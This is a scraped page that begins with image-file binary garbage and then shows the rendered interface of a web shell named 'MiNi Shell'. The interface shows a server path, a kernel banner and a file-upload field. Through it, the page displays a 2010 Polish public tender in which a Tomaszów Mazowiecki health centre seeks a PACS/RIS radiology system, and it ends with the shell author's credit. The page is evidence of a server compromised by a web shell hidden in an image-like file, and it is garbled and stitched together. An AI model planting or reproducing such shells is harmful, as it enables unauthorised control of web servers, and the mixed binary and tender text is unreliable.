JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/4226-N-2010.html

<p class="kh_header"><b>Tomaszów Mazowiecki: DOSTAWA SYSTEMU ARCHIWIZACJI I DYSTRYBUCJI OBRAZÓW 
(PACS) ORAZ RADIOLOGICZNEGO SYSTEMU INFORMATYCZNEGO RIS DLA TOMASZOWSKIEGO CENTRUM ZDROWIA  W TOMASZOWIE MAZOWIECKIM</b><br>
<b>Numer ogłoszenia: 4226 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tomaszowskie Centrum Zdrowia sp. z o.o. , ul. Jana Pawła II 35, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 044 7257235, faks 044 7257235.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SYSTEMU ARCHIWIZACJI I DYSTRYBUCJI OBRAZÓW 
(PACS) ORAZ RADIOLOGICZNEGO SYSTEMU INFORMATYCZNEGO RIS DLA TOMASZOWSKIEGO CENTRUM ZDROWIA  W TOMASZOWIE MAZOWIECKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia niniejszego postępowania przetargowego jest : 
Dostawa systemu cyfrowego archiwum obrazowego PACS wraz z jego rozmieszczeniem i instalacją oraz szkolenie personelu Zamawiającego w zakresie jego uruchomienia eksploatacji, obsługi i konserwacji oraz dostawa radiologicznego systemu informatycznego RIS 
- Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ.
Dostawa obejmuje sprzęt fabrycznie nowy;
Zamówieniem objęte są również:
- transport,
- montaż 
- szkolenie,
Wykonawca zobowiązany jest do przeprowadzenia szkolenia personelu Zamawiającego z zakresu prawidłowej eksploatacji systemu. W trakcie szkolenia musi zostać przekazana wiedza do poprawnego korzystania z systemu, tworzenia i gromadzenia informacji związanych wykonywaniem czynności służbowych, tworzenia i gromadzenie   dokumentów, wykonywania analiz i sprawozdań, współpracy z pozostałymi jednostkami organizacyjnymi. Szkolenie przeprowadzone zostanie z zakresu:
administracji systemu - dla informatyka natomiast szkolenie z zakresu użytkowania systemu dla: lekarzy, techników radiologii.
Miejscem dostawy i montażu będzie miejsce wskazane przez Zamawiającego. 
Warunki dostaw opisane są w projekcie umowy - załącznik nr 4. W załączniku nr 2, w określeniu szczegółowym przedmiotu zamówienia zawarte są kryteria, które muszą być bezwzględnie spełnione..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 48.18.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki:
1.  Spełniają warunki określone przepisami art. 22 ust. 1 prawa zamówień publicznych.
-posiadania uprawnień  do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
-posiadania wiedzy i doświadczenia;
-dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-sytuacji ekonomicznej i finansowej;
2.  W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia,      Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o      udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w      sprawie zamówienia publicznego.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty.
Zamawiający odrzuca ofertę Wykonawcy:
-  gdy jest ona niezgodna z ustawą,
- jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, a w    szczególności 
   nie spełnia wszystkich wymogów - przedmiotu zamówienia,
-  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
   nieuczciwej konkurencji,
-  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
-  wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
-  zawiera błędy w obliczeniu ceny,
- wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na    poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3,
-  nieważnej na podstawie odrębnych przepisów.
Warunki dodatkowe:
-termin płatności w 13 ratach:
1 rata  w wysokości 100.000,00 zł płatna w terminie 30 dni od daty dostawy, instalacji, przeszkolenia personelu i przekazania do Działu Zamówień protokołu z wykonanych powyższej czynności,
-pozostałe kwota rozłożona na 12 równych miesięcznych rat płaconych począwszy od następnego miesiąca po miesiącu od zapłaceniu pierwszej raty do 20 dnia każdego miesiąca wg ustalonego harmonogramu. 
-foldery, ulotki, instrukcje itp. materiały potwierdzające wymagane parametry
-okres gwarancji min.24 miesiące..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz Oferty wg załącznika nr 1.
2.	Wypełniony Przedmiot zamówienia - wg załącznika nr 2.
3.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 prawa zamówień publicznych   załącznik nr 3.1
4.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24  ust. 1 i  2 prawa zamówień publicznych - załączniki nr 3.2
5.	Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust. 1:
5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.2 Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS u lub KRUS-u potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 5, składa odpowiedni dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, odpowiednio że: 
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
       b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania  decyzji właściwego  organu,
       c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
7.	Dokumenty, o których mowa w pkt 6a i pkt 6c powinny być wystawione nie     wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 6b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
9.	 W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie dla wspólnego pełnomocnika.
10.	Upoważnienie do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Upoważnienie musi by w formie oryginału lub notarialnie poświadczonej kopii.
11.	Materiały informacyjne producenta urządzenia dokładnie opisujące oferowany przedmiot zamówienia, co najmniej pod kątem potwierdzenia wymaganych parametrów technicznych zgodnie z opisem w SIWZ, np. folder, katalogi, ulotki informacyjne, opisy, dokumentacje techniczną.
12.	Świadectwo certyfikacji, że oferowany przedmiot zamówienia posiada dokument dopuszczenia do obrotu i stosowania tj. 
     - Deklaracja zgodności CE
13.	Wykaz wykonanych dostaw(minimum 1), a w przypadku świadczeń  okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i  wartością przedmiotowi  zamówienia. Forma wykazu wg załącznika nr 5 do SIWZ. Do wykazu należy dołączyć, minimum 1 dokument potwierdzający, że te dostawy zostały wykonane należycie (referencje).
14.	 Zamawiający żąda wskazania przez Wykonawcę w ofercie części Zamówienia, której wykonanie powierzy podwykonawcom. Zamawiający bezwzględnie żąda spełnienia - pod rygorem  odrzucenia oferty - tego wymogu poprzez wypełnienie punktu nr 8 w formularzu oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.centrum.tomaszow.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Tomaszowskie Centrum Zdrowia sp. z o.o. ul. Jana Pawła II 35, 97-200 Tomaszów Maz. ZAMÓWIENIA PUBLICZNE.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2010 godzina 10:00, miejsce: Tomaszowskie Centrum Zdrowia sp. z o.o. ul. Jana Pawła II 35, 97-200 Tomaszów Maz., SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com